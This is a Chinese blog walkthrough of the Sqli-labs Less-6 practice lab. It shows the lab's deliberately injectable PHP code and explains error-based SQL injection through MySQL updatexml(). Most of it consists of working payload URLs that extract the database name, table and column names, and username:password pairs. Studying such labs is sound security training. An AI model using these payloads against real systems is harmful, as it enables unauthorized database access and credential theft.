Sqli-labs Less-6 使用updatexml()函数进行报错注入

Less6与Less5的区别在于Less6在id参数传到服务器时,对id参数进行了处理。这里可以从源代码中可以看到。

$id=$_GET[‘id‘];
$id = ‘"‘.$id.‘"‘; //套了双引号
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo ‘<font size="5" color="#FFFF00">‘;	
  	echo ‘You are in...........‘;
  	echo "<br>";
  	echo "</font>";
  	}
	else 
	{
	
	echo ‘<font size="3"  color= "#FFFF00">‘;
	print_r(mysql_error());
	echo "</br></font>";	
	echo ‘<font color= "#0000ff" font size= 3>‘;	
	
	}

那我们在这一关的策略和Less5的是一样的。Less5的所有方法均适用于Less6,只需要将 ‘ 替换成 "。

现在我们介绍一下使用updatexml()函数进行报错注入。

updatexml():更新xml文档的函数

语法:updatexml(目标xml文档,xml路径,更新的内容)

第二个参数 xml路径 是可操作的地方,xml文档中路径是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。

正常查询 第二个参数的格式为 /xxx/xx/xx/xx ,即使查询不到也不会报错

select username from security.users where id=1 and updatexml(‘anything‘,‘/x/xx‘,‘anything‘);

Sqli-labs Less-6 使用updatexml()函数进行报错注入

使用concat()拼接 ‘ / ‘ 效果相同,下面语句是在’anything’中查询 位置是 /database()的内容,并将其更新为’anything’。

select username from security.users where id=1 and updatexml(‘anything‘,concat(‘/‘,(select database())),‘anything‘);

Sqli-labs Less-6 使用updatexml()函数进行报错注入

但这里也没有语法错误,不会报错,下面故意写入语法错误:

select username from security.users where id=1 and updatexml(‘anything‘,concat(‘~‘,(select database())),‘anything‘);

Sqli-labs Less-6 使用updatexml()函数进行报错注入

可以看出,以~开头的内容不是xml格式的语法,报错,但是会显示无法识别的内容是什么,这样就达到了目的。

有一点需要注意,update()能查询字符串的最大长度为32,就是说如果我们想要的结果超过32,就需要用substring()函数截取,一次查看32位

这里查询前5位示意:

select username from security.users where id=1 and updatexml(‘anything‘,concat(‘~‘,substring((select database()),1,5)),‘anything‘);

Sqli-labs Less-6 使用updatexml()函数进行报错注入

好了,现在我们明白了原理,试一下吧。

 

首先获取user()的值

http://127.0.0.1/sql/Less-6/?id=1" and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

其中0x7e是ASCII编码,解码结果为~。

Sqli-labs Less-6 使用updatexml()函数进行报错注入

 

然后尝试获取当前数据库的库名 

http://127.0.0.1/sql/Less-6/?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

Sqli-labs Less-6 使用updatexml()函数进行报错注入

 

接着可以利用select语句继续获取数据库中的库名、表名和字段名。查询语句与union注入的相同。因为报错注入只显示一条结果,所以需要使用limit语句限制查询结果,或者使用group_concat函数将查询结果打印在一行显示。

获取其他数据库的库名

http://127.0.0.1/sql/Less-6/?id=1" and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1),0x7e),1)--+

Sqli-labs Less-6 使用updatexml()函数进行报错注入

 

获取当前数据库的表名

可以使用limit一个一个查询

http://127.0.0.1/sql/Less-6/?id=1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)--+

Sqli-labs Less-6 使用updatexml()函数进行报错注入

 

也可以使用group_concat(table_name)一次性查询出所有的表名

http://127.0.0.1/sql/Less-6/?id=1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+

Sqli-labs Less-6 使用updatexml()函数进行报错注入

 

获取users表的字段名

http://127.0.0.1/sql/Less-6/?id=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘),0x7e),1)--+

Sqli-labs Less-6 使用updatexml()函数进行报错注入

 

获取users表的内容

http://127.0.0.1/sql/Less-6/?id=1" and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1)--+

Sqli-labs Less-6 使用updatexml()函数进行报错注入

 

使用extractvalue()函数构造类似的payload也可以产生同样的xpath报错,大家可以自行尝试。

 

参考:https://blog.csdn.net/zpy1998zpy/article/details/80631036

 

Sqli-labs Less-6 使用updatexml()函数进行报错注入

上一篇:Sqli-labs Less-30 HPP参数污染攻击


下一篇:数据库-第五章 数据库完整性-5.7 触发器